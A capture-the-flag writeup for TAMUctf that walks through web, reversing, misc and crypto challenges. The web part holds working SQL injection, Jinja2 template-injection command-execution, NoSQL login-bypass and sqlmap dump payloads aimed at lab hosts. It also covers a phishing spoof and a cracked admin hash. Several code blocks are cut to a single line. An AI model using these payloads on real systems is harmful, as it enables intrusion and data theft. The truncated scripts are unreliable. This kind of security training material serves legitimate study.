TAMUctf writeup
Web
Not Another SQLi Challenge
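Logging in triggers a redirect. To keep the request so it can be replayed in Burp, tick "Preserve log" on the Network tab of the Chrome developer tools.
Log in with a "universal password", an always-true condition injected into the username field.
```bash
$ curl -s "http://web1.tamuctf.com/web/login.php" -d "username=admin' or 1=1#&password" | grep -o "gigem{.*}"
```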
Robots Rule
```bash
$ curl "http://web5.tamuctf.com/robots.txt"
```
As the hint says, request robots.txt while posing as Googlebot.
```bash
$ curl "http://web5.tamuctf.com/robots.txt" -A "Googlebot/2.1 (+http://www.google.com/bot.html)" -s | grep -o "gigem{.*}"
```
Many Gig’ems to you!
```bash
$ curl -s http://web7.tamuctf.com/index.html | grep -oE 'gigem{[^"]+"'
```
Joining the pieces found across several related pages gives the flag `gigem{flag_in_source_and_cookies`. This challenge is not very interesting.
Science!
Difficulty: medium
Flask SSTI (server-side template injection).
Command execution:
```
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('ls -Rhl').read()}}
```
File read:
```
{{''.__class__.__mro__[2].__subclasses__()[40]('flag.txt').read()}}
```
gigem{5h3_bl1nd3d_m3_w17h_5c13nc3}
Contents of views.py:
```python
import json
```
References:
- Flask/Jinja2 SSTI
- Flask/Jinja2 SSTI && Python sandbox escape
Buckets
Checkout my s3 bucket website!
http://tamuctf.s3-website-us-west-2.amazonaws.com/
Difficulty: easy
Unauthorized access to an Amazon S3 bucket.
The link shows that the bucket name is `tamuctf`. Visit http://tamuctf.s3.amazonaws.com/ and search the returned listing to find `Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt`. Requesting http://tamuctf.s3.amazonaws.com/Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt returns the flag `flag{W0W_S3_BAD_PERMISSIONS}`.
Login App
Difficulty: medium
The page source contains a piece of JavaScript:
```html
<script>
```
NoSQL injection.
Request:
```http
POST /login HTTP/1.1
```
Or:
```bash
curl -H 'Content-Type: application/json; charset=UTF-8' -X POST --data '{"username":{"$ne":"nosql"},"password":{"$ne":"injection"}}' http://web4.tamuctf.com/login
```
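Why the `$ne` body above authenticates, and the type check that stops it, as an added example that is not the challenge's server code. `mongo_like_match` is a hypothetical stand-in that models only equality and `$ne`, and the user record is constructed.

```python
import json

# Request body taken from the curl command in the writeup.
PAYLOAD = '{"username":{"$ne":"nosql"},"password":{"$ne":"injection"}}'

# Constructed sample record; the real user store is not shown on the page.
USERS = [{"username": "admin", "password": "constructed-hash"}]


def mongo_like_match(doc, query):
    """Hypothetical stand-in for a MongoDB filter: equality and {"$ne": v} only."""
    for field, cond in query.items():
        value = doc.get(field)
        if isinstance(cond, dict):
            if set(cond) != {"$ne"}:
                raise NotImplementedError("only $ne is modelled")
            if value == cond["$ne"]:
                return False
        elif value != cond:
            return False
    return True


def find_user(query):
    return next((u["username"] for u in USERS if mongo_like_match(u, query)), None)


def login_vulnerable(body):
    """Parsed JSON goes straight into the filter, so objects become operators."""
    creds = json.loads(body)
    return find_user({"username": creds.get("username"),
                      "password": creds.get("password")})


def login_hardened(body):
    """Accept only plain strings before building the filter."""
    creds = json.loads(body)
    user, password = creds.get("username"), creds.get("password")
    if not isinstance(user, str) or not isinstance(password, str):
        raise ValueError("username and password must be strings")
    return find_user({"username": user, "password": password})
```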
Bird Box Challenge
We’ve got Aggies, Trucks, and Eggs!
Difficulty: hard
```bash
neo@o:~$ curl -sG --data-urlencode "Search=test" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>"
```
Go straight for SQL injection.
```sql
'UNION ALL SELECT GROUP_CONCAT(table_schema) FROM information_schema.tables WHERE table_schema != 'information_schema' #
```
Looking through the database turns up nothing: the flag is not stored there, so try the database user name instead.
```bash
neo@o:~$ curl -sG --data-urlencode "Search=test'union select current_user#" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>"
```
sqlmap can also be used directly.
```bash
sqlmap -u "http://web2.tamuctf.com/Search.php?Search=eggs" -p Search --dbms mysql --random-agent --sql-shell --hex --threads 10 --proxy=http://127.0.0.1:1080
```
1337 Secur1ty
Difficulty: hard
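Register a user and log in.
The QR code decodes to `otpauth://totp/TAMU_CTF?secret=5UGMBIONB66MCOXH`.
Messages can be clicked to view their details.
Test the link http://web6.tamuctf.com/message?id=2 for injection.
```bash
python sqlmap.py -u "http://web6.tamuctf.com/message?id=2" -p id --threads 10 --dump-all --random-agent --hex
```
This yields the admin user's email 1337-admin@l337secur1ty.hak, Secret value `WIFHXDZ3BOHJMJSC`, id 1, and password hash `02ca0b0603222a090fe2fbf3ba97d90c`. A lookup on somd5 gives the corresponding plaintext `secretpasscode`.
Modifying the cookie in Burp and forwarding the request reveals the flag `gigem{th3_T0tp_1s_we4k_w1tH_yoU}`.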
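A TOTP code depends only on the shared secret and the clock (RFC 6238), so a secret stored where an injectable query can read it no longer acts as a second factor. The following added example, not part of the original writeup, parses the otpauth URI decoded from the QR code and computes codes with the RFC 6238 defaults (HMAC-SHA1, 30-second step); the function names are illustrative.

```python
import base64
import hashlib
import hmac
import struct
import time
from urllib.parse import parse_qs, urlparse

# URI decoded from the QR code in the writeup (the author's own enrolment).
PAGE_URI = "otpauth://totp/TAMU_CTF?secret=5UGMBIONB66MCOXH"


def secret_from_otpauth(uri):
    """Return the raw key bytes from an otpauth://totp URI (base32 'secret')."""
    parsed = urlparse(uri)
    if parsed.scheme != "otpauth" or parsed.netloc != "totp":
        raise ValueError("not a TOTP otpauth URI")
    secret = parse_qs(parsed.query)["secret"][0].upper()
    secret += "=" * (-len(secret) % 8)  # base32 input must be padded to 8 chars
    return base64.b32decode(secret)


def hotp(key, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the 8-byte counter, then dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key, at=None, step=30, digits=6):
    """RFC 6238: HOTP with the counter set to floor(unix_time / step)."""
    now = time.time() if at is None else at
    return hotp(key, int(now) // step, digits)


if __name__ == "__main__":
    print(totp(secret_from_otpauth(PAGE_URI)))
```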
Reversing
Cheesy
```bash
echo Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ== | base64 -d
```
Snakes over cheese
Decompiling the .pyc file with an online decompiler gives the following code:
```python
# uncompyle6 version 3.2.5
```
So Fqaa converts to `flag{decompile}`.
042
Cheers for actual assembly!
#medium
```asm
    .section __TEXT,__text,regular,pure_instructions
    .build_version macos, 10, 14
    .globl _concat ## -- Begin function concat
    .p2align 4, 0x90
_concat: ## @concat
    .cfi_startproc
## %bb.0:
    pushq %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset %rbp, -16
    movq %rsp, %rbp
    .cfi_def_cfa_register %rbp
    subq $48, %rsp
    movq %rdi, -8(%rbp)
    movq %rsi, -16(%rbp)
    movq -8(%rbp), %rdi
    callq _strlen
    movq -16(%rbp), %rdi
    movq %rax, -32(%rbp) ## 8-byte Spill
    callq _strlen
    movq -32(%rbp), %rsi ## 8-byte Reload
    addq %rax, %rsi
    addq $1, %rsi
    movq %rsi, %rdi
    callq _malloc
    movq $-1, %rdx
    movq %rax, -24(%rbp)
    movq -24(%rbp), %rdi
    movq -8(%rbp), %rsi
    callq ___strcpy_chk
    movq $-1, %rdx
    movq -24(%rbp), %rdi
    movq -16(%rbp), %rsi
    movq %rax, -40(%rbp) ## 8-byte Spill
    callq ___strcpy_chk
    movq -24(%rbp), %rdx
    movq %rax, -48(%rbp) ## 8-byte Spill
    movq %rdx, %rax
    addq $48, %rsp
    popq %rbp
    retq
    .cfi_endproc
    ## -- End function
    .globl _main ## -- Begin function main
    .p2align 4, 0x90
_main: ## @main
    .cfi_startproc
## %bb.0:
    pushq %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset %rbp, -16
    movq %rsp, %rbp
    .cfi_def_cfa_register %rbp
    subq $80, %rsp
    leaq L_.str(%rip), %rdi
    movl $3, %eax
    movl $14, %ecx
    xorl %esi, %esi
    movl $8, %edx
    ## kill: def %rdx killed %edx
    leaq -16(%rbp), %r8
    movq ___stack_chk_guard@GOTPCREL(%rip), %r9
    movq (%r9), %r9
    movq %r9, -8(%rbp)
    movl $0, -20(%rbp)
    movq %rdi, -56(%rbp) ## 8-byte Spill
    movq %r8, %rdi
    movl %ecx, -60(%rbp) ## 4-byte Spill
    movl %eax, -64(%rbp) ## 4-byte Spill
    callq _memset
    movb $65, -16(%rbp)
    movb $53, -15(%rbp)
    movb $53, -14(%rbp)
    movb $51, -13(%rbp)
    movb $77, -12(%rbp)
    movb $98, -11(%rbp)
    movb $49, -10(%rbp)
    movb $89, -9(%rbp)
    movl $0, -28(%rbp)
    movl $1, -32(%rbp)
    movl $2, -36(%rbp)
    movl -36(%rbp), %eax
    imull -36(%rbp), %eax
    imull -36(%rbp), %eax
    movl -28(%rbp), %ecx
    addl -32(%rbp), %ecx
    addl -32(%rbp), %ecx
    addl -32(%rbp), %ecx
    imull %ecx, %eax
    cltd
    movl -60(%rbp), %ecx ## 4-byte Reload
    idivl %ecx
    movl %eax, -40(%rbp)
    movl -36(%rbp), %eax
    imull -36(%rbp), %eax
    imull -36(%rbp), %eax
    movl -28(%rbp), %esi
    addl -32(%rbp), %esi
    addl -32(%rbp), %esi
    imull %esi, %eax
    cltd
    movl -64(%rbp), %esi ## 4-byte Reload
    idivl %esi
    movl %eax, -44(%rbp)
    movl -40(%rbp), %esi
    movq -56(%rbp), %rdi ## 8-byte Reload
    movb $0, %al
    callq _printf
    leaq L_.str.1(%rip), %rdi
    movl -44(%rbp), %esi
    movl %eax, -68(%rbp) ## 4-byte Spill
    movb $0, %al
    callq _printf
    leaq L_.str.2(%rip), %rdi
    leaq -16(%rbp), %rsi
    movl %eax, -72(%rbp) ## 4-byte Spill
    movb $0, %al
    callq _printf
    movq ___stack_chk_guard@GOTPCREL(%rip), %rsi
    movq (%rsi), %rsi
    movq -8(%rbp), %rdi
    cmpq %rdi, %rsi
    movl %eax, -76(%rbp) ## 4-byte Spill
    jne LBB1_2
## %bb.1:
    xorl %eax, %eax
    addq $80, %rsp
    popq %rbp
    retq
LBB1_2:
    callq ___stack_chk_fail
    ud2
    .cfi_endproc
    ## -- End function
    .section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
    .asciz "The answer: %d\n"
L_.str.1: ## @.str.1
    .asciz "Maybe it's this:%d\n"
L_.str.2: ## @.str.2
    .asciz "gigem{%s}\n"
.subsections_via_symbols
```
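Note lines 71-78 of the listing: the eight `movb` instructions that store the byte values 65, 53, 53, 51, 77, 98, 49, 89 into the buffer at -16(%rbp), which is later passed to printf with the `gigem{%s}` format string.
```python
print("gigem{%s}" % "".join(chr(i) for i in [65, 53, 53, 51, 77, 98, 49, 89]))
```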
Misc
Who am I?
What is the A record for tamuctf.com?
(Not in standard gigem{flag} format)
The A record for `tamuctf.com` is `52.33.57.247`; submit that as the answer. It can be found with an online lookup site or with the command `nslookup -type=all tamuctf.com`.
Who do I trust?
Who issued the certificate to tamuctf.com?
(Not in standard gigem{flag} format)
Inspecting the certificate shows that the issuer is `Let's Encrypt Authority X3`.
Where am I?
What is the name of the city where the server for tamuctf.com is located?
(Not in standard gigem{flag} format)
An online lookup site gives the city where the server is located as `Boardman`.
I heard you like files.
```bash
$ binwalk -e art.png
```
Hello World
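Selecting everything on the page (select all) reveals the clue.
The hidden content is a program in a language made up entirely of whitespace characters (spaces, tabs and newlines). An online interpreter can run it.
flag is `gigem{0h_my_wh4t_sp4c1ng_y0u_h4v3}`.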
Onboarding Checklist
From: importantperson@somebigcorp.com
Date: Feb 22, 2019 9:00 AM
To: someguy@somebigcorp.com
Subject: New Employee Access
Hello Some Guy,
We need to begin sending requests for the new employee to get access to our security appliances. I believe they already know that you are authorized to make a new account request. Would you mind sending the new employee’s email address to tamuctf@gmail.com so they can process the account request?
Thank you,
Important Person
The new employee can be a little slow to respond.
Difficulty: easy
2/26 8:42 am CST: Visiting somebigcorp.com is not part of the challenge
Send the phishing email as instructed; the reply contains the flag `gigem{wuT_4n_31337_sp0ofer_494C4F5645594F55}`.
Crypto
-.-
To 1337-H4X0R:
Our coworker Bob loves a good classical cipher. Unfortunately, he also loves to send everything encrypted with these ciphers. Can you go ahead and decrypt this for me?
Difficulty: easy
flag.txt contains Morse code spelled out in dah/dit syllables.
solve.py
```python
import re
```
RSAaaay
Hey, you’re a hacker, right? I think I am too, look at what I made!
(2531257, 43)
My super secret message:
906851 991083 1780304 2380434 438490 356019 921472 822283 817856 556932 2102538 2501908 2211404 991083 1562919 38268
Problem is, I don’t remember how to decrypt it… could you help me out?
Difficulty: easy
solve.py
```python
import gmpy2
```
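The public modulus 2531257 is only about 22 bits, so trial division recovers the private key at once. This is an added example, not the author's solve.py, and it uses only the standard library; the rule for splitting each decrypted number into ASCII codes is an assumption that holds for printable characters.

```python
from math import isqrt

# Public key and ciphertext blocks copied from the challenge text.
N, E = 2531257, 43
CIPHERTEXT = [906851, 991083, 1780304, 2380434, 438490, 356019, 921472, 822283,
              817856, 556932, 2102538, 2501908, 2211404, 991083, 1562919, 38268]


def factor(n):
    """Trial division over odd candidates; feasible only for a tiny modulus."""
    for p in range(3, isqrt(n) + 1, 2):
        if n % p == 0:
            return p, n // p
    raise ValueError("no odd factor found")


def private_exponent(n, e):
    """d = e^-1 mod phi(n), with phi(n) = (p - 1)(q - 1)."""
    p, q = factor(n)
    return pow(e, -1, (p - 1) * (q - 1))


def digits_to_text(digits):
    """Split a decimal string into ASCII codes.

    Assumption: printable ASCII only, so a code starting with '1' has three
    digits (100-126) and any other code has two (32-99).
    """
    out, i = [], 0
    while i < len(digits):
        width = 3 if digits[i] == "1" else 2
        out.append(chr(int(digits[i:i + width])))
        i += width
    return "".join(out)


def decrypt(n=N, e=E, blocks=CIPHERTEXT):
    d = private_exponent(n, e)
    return "".join(digits_to_text(str(pow(c, d, n))) for c in blocks)


if __name__ == "__main__":
    print(decrypt())
```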
:)
Look at what I found!
XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlbCVZATl1WTBpaTkBOQFVcSQdH
Difficulty: easy
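Plain base64 decoding yields no printable characters. The flag is known to start with `gigem{`, so XOR the base64-decoded bytes with `gigem` byte by byte; the result is `:):):`, which reveals the pattern.
solve.py
```python
import base64,itertools
```
zip and itertools.cycle are used as follows:
```
zip(seq1 [, seq2 [...]]) -> [(seq1[0], seq2[0] ...), (...)]
```
There is also a good tool (https://gchq.github.io/CyberChef/#recipe=Magic(3,true,false,'')&input=WFVCZFRGZFNjdzVYQ1ZSR1RnbEpYRXBNU0ZwT1FFNUFWVnhKQlJwTFQxMGFZQnBJVndsYkNWWkFUbDFXVEJwYVRrQk9RRlZjU1FkSA) that can try to detect the likely format of the data.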
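The known-plaintext step described above, as an added example rather than the author's solve.py: XOR the ciphertext with the known flag prefix to expose key bytes, reduce them to the shortest repeating unit, and decrypt with that key. The function names are illustrative.

```python
import base64
from itertools import cycle

# Ciphertext from the challenge text; the crib is the known flag prefix.
CIPHERTEXT_B64 = ("XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlb"
                  "CVZATl1WTBpaTkBOQFVcSQdH")
CRIB = b"gigem{"


def keystream_from_crib(ciphertext, crib):
    """ciphertext XOR known plaintext = the key bytes used at those positions."""
    return bytes(c ^ p for c, p in zip(ciphertext, crib))


def shortest_period(stream):
    """Smallest prefix that, repeated, reproduces the whole recovered keystream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def xor_repeating(data, key):
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, cycle(key)))


def solve(b64=CIPHERTEXT_B64, crib=CRIB):
    ciphertext = base64.b64decode(b64)
    key = shortest_period(keystream_from_crib(ciphertext, crib))
    return key, xor_repeating(ciphertext, key)


if __name__ == "__main__":
    key, plaintext = solve()
    print(key, plaintext.decode())
```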
Holey Knapsack
My knapsack has a hole in it
Cipher text:
11b90d6311b90ff90ce610c4123b10c40ce60dfa123610610ce60d450d000ce61061106110c4098515340d4512361534098509270e5d09850e58123610c9
Public key:
{99, 1235, 865, 990, 5, 1443, 895, 1477}
The flag is slightly off format.
Difficulty: medium
This is the well-known Merkle-Hellman public key cryptosystem, published in the same year as RSA. It is one of the knapsack cryptosystems and has been broken. See https://www.nevivur.net/writeups/2019/02/tamuctf-19/#holey-knapsack .
Decryption script:
```python
#!/usr/bin/env python3
```
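With only eight public weights, each ciphertext block hides one of 256 possible subsets, so the knapsack can be inverted by enumerating them all without any lattice attack. This is an added example that uses exhaustive search in place of the referenced writeup's script; it assumes four hex digits per block (the largest possible sum is 7009 = 0x1b61) and that bit i of each byte, least significant first, selects weight i.

```python
# Public key and ciphertext copied from the challenge text.
PUBLIC_KEY = [99, 1235, 865, 990, 5, 1443, 895, 1477]
CIPHERTEXT_HEX = ("11b90d6311b90ff90ce610c4123b10c40ce60dfa123610610ce60d45"
                  "0d000ce61061106110c4098515340d4512361534098509270e5d0985"
                  "0e58123610c9")


def knapsack_sum(byte, public_key):
    """Encrypt one byte: add the weights selected by its bits (LSB first)."""
    return sum(w for i, w in enumerate(public_key) if (byte >> i) & 1)


def subset_sum_table(public_key):
    """Map each reachable sum to every byte value that produces it."""
    table = {}
    for byte in range(1 << len(public_key)):
        table.setdefault(knapsack_sum(byte, public_key), []).append(byte)
    return table


def decrypt(cipher_hex=CIPHERTEXT_HEX, public_key=PUBLIC_KEY, width=4):
    """Invert each fixed-width hex block by table lookup."""
    table = subset_sum_table(public_key)
    out = []
    for i in range(0, len(cipher_hex), width):
        total = int(cipher_hex[i:i + width], 16)
        candidates = table.get(total, [])
        if len(candidates) != 1:
            # No subset, or more than one, reaches this sum: the block-size or
            # bit-order assumption does not fit the data.
            raise ValueError(f"block {total:#06x}: {len(candidates)} candidates")
        out.append(candidates[0])
    return bytes(out).decode("ascii")


if __name__ == "__main__":
    print(decrypt())
```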